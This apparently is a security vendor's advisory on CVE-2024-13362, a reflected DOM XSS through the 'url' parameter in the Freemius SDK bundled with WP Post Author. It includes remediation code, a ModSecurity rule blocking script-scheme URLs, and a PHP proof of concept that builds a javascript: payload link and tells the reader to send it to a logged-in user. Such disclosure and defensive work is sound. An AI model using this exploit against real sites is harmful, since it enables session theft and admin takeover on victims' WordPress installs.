Atomic Edge analysis of CVE-2024-13362 (metadata-based): This vulnerability affects the WP Post Author plugin version 3.8.3 and earlier. It is a reflected DOM-based cross-site scripting (XSS) flaw in the Freemius SDK (bundled with the plugin) that allows unauthenticated attackers to inject arbitrary JavaScript. The CVSS score is 6.1 (Medium); the vector indicates a network attack vector, low attack complexity, no privileges required, and user interaction required (the victim must click a link). The CWE-79 classification (improper neutralization of input during web page generation) matches this description.
The root cause is insufficient sanitization of the ‘url’ parameter before it is used to generate HTML or JavaScript in the browser. DOM-based XSS occurs when client-side JavaScript reads attacker-controlled data from the URL (e.g., location.search) and writes it to the DOM without proper encoding. Since no code diff is available, Atomic Edge research infers that the vulnerable code likely reads the ‘url’ GET parameter and passes it to methods like innerHTML or jQuery’s html() without sanitization. This is confirmed by the CWE classification and description which explicitly mentions the ‘url’ parameter. The Freemius SDK is a common library used by many plugins and themes, which explains the broad scope.
Exploitation requires tricking a user into clicking a crafted link. The attack vector is a URL like: http://target.com/?url=javascript:alert(document.domain). The user must be logged into WordPress for the session to be active, but no authentication is needed to trigger the XSS. The payload executes in the context of the vulnerable page, typically an admin page or plugin settings panel that includes the Freemius SDK. The attacker can use encoded or obfuscated JavaScript to evade basic filters, but the core flaw is that the ‘url’ parameter is reflected into the DOM without escaping.
Remediation should involve sanitizing the ‘url’ parameter using WordPress’s esc_url_raw() before storing or embedding it, and output escaping with esc_url() or esc_js() when rendering. The patched version 3.8.4 likely adds proper validation to ensure the URL starts with allowed protocols (http, https) and strips javascript: or data: URIs. Additionally, client-side code should use safe assignment methods like textContent or jQuery’s text() instead of innerHTML.
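The client-side half of that remediation (allow-list the scheme of the 'url' parameter, then build the DOM node with setAttribute and textContent rather than innerHTML), as an added example that is not code from the Freemius SDK or the WP Post Author plugin; readUrlParam, sanitizeUrl, renderLinkUnsafe and renderLinkSafe are assumed names, and https://example.invalid/ is a placeholder origin. It goes slightly beyond the paragraph by also showing how the URL parser defeats whitespace and tab-split scheme tricks that a plain prefix check misses.

```javascript
// Added example, not code from the Freemius SDK or the WP Post Author plugin.
// Assumed names: readUrlParam, sanitizeUrl, renderLinkUnsafe, renderLinkSafe;
// https://example.invalid/ is a placeholder origin used for stand-alone runs.

const ALLOWED_SCHEMES = ["http:", "https:"];

// Read the raw 'url' value from a query string such as location.search.
function readUrlParam(search, name = "url") {
  return new URLSearchParams(search).get(name);
}

// Resolve the untrusted value against the page origin and keep it only when the
// scheme is allow-listed. The WHATWG URL parser strips leading whitespace and
// embedded tab/newline before reading the scheme, so "  JavaScript:" and
// "java\tscript:" are rejected, which a naive startsWith check would miss.
// Returns the normalised href, or null when the value is rejected.
function sanitizeUrl(raw, base = "https://example.invalid/", sameOrigin = false) {
  if (typeof raw !== "string" || raw.length === 0) return null;
  let parsed;
  try {
    parsed = new URL(raw, base);
  } catch (e) {
    return null; // unparseable input is dropped, never passed through
  }
  if (!ALLOWED_SCHEMES.includes(parsed.protocol)) return null;
  if (sameOrigin && parsed.origin !== new URL(base).origin) return null;
  return parsed.href;
}

// The bug class on this page: the parameter is concatenated into markup.
function renderLinkUnsafe(container, raw) {
  container.innerHTML = '<a href="' + raw + '">' + raw + "</a>";
}

// Hardened form: validate first, then build the node with setAttribute and
// textContent so nothing is ever parsed as HTML. Takes the document as an
// argument so the logic can be exercised outside a browser.
function renderLinkSafe(container, doc, raw, base) {
  const href = sanitizeUrl(raw, base);
  if (href === null) return false;
  const a = doc.createElement("a");
  a.setAttribute("href", href);
  a.textContent = href;
  container.replaceChildren(a);
  return true;
}

if (typeof document !== "undefined") {
  renderLinkSafe(document.body, document, readUrlParam(location.search), location.href);
}
```

Passing sameOrigin = true additionally rejects protocol-relative values such as //other-host/, which matters when the parameter is later used for a redirect.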
Successful exploitation allows an attacker to execute arbitrary JavaScript in the victim’s browser within the WordPress admin context. This can be used to steal session cookies, perform administrative actions on behalf of the victim (e.g., create new admin users, modify content), or redirect users to malicious sites. Since the attack requires user interaction and executes in a browser session, the impact is limited by the attacker’s ability to craft a convincing phishing link.
Here you will find our ModSecurity-compatible rule to protect against this particular CVE.
```apache
# Atomic Edge WAF Rule - CVE-2024-13362 (metadata-based)
# Blocks reflected DOM XSS via the 'url' parameter containing javascript: or data: schemes.
# t:removeWhitespace runs after URL decoding so that a leading space or an embedded
# tab/newline (java<TAB>script:) cannot slip past the anchored regex.
SecRule REQUEST_URI "@rx ^/wp-admin/" "id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2024-13362 Reflected XSS via url parameter',severity:'CRITICAL',tag:'CVE-2024-13362',tag:'wordpress',tag:'xss'"
    SecRule ARGS_GET:url "@rx ^(javascript|data|vbscript):" "t:none,t:urlDecodeUni,t:removeWhitespace,t:lowercase"

# Also catch the url parameter on any page, since the vulnerable script may be loaded outside wp-admin
SecRule REQUEST_URI "@rx /" "id:20261995,phase:2,deny,status:403,chain,msg:'CVE-2024-13362 Reflected XSS via url parameter (catch-all)',severity:'CRITICAL',tag:'CVE-2024-13362',tag:'wordpress',tag:'xss'"
    SecRule ARGS_GET:url "@rx ^(javascript|data|vbscript):" "t:none,t:urlDecodeUni,t:removeWhitespace,t:lowercase"
```
```php
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================

// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2024-13362 - Freemius <= 2.10.1 - Reflected DOM-Based Cross-Site Scripting via url Parameter
// This PoC exploits the reflected XSS via the 'url' parameter on any WordPress page
// that includes the vulnerable Freemius SDK. The attacker must trick a logged-in user
// into clicking the generated URL.

$target_url = 'http://localhost/wordpress'; // Change to the target WordPress base URL
$payload = 'javascript:alert("AtomicEdge_XSS_PoC")';

// Construct the malicious URL
$malicious_url = rtrim($target_url, '/') . '/?url=' . urlencode($payload);

echo "[+] CVE-2024-13362 PoC URL:\n";
echo $malicious_url . "\n\n";
echo "Send this link to a logged-in WordPress user to trigger the XSS.\n";
echo "When clicked, the JavaScript payload will execute in their browser session.\n";

// Optional: Test if the target responds (does not prove XSS, but validates access)
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $malicious_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch); // false on transport failure, so guard before strpos()
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "HTTP Response Code: " . $http_code . "\n";
if ($response !== false && strpos($response, $payload) !== false) {
    echo "[!] Payload appears in response, indicating potential vulnerability.\n";
} else {
    // A DOM-based sink reads the value client-side, so the raw HTML usually will not contain it
    echo "[!] Payload not found in raw response. Check DOM for client-side reflection.\n";
}
```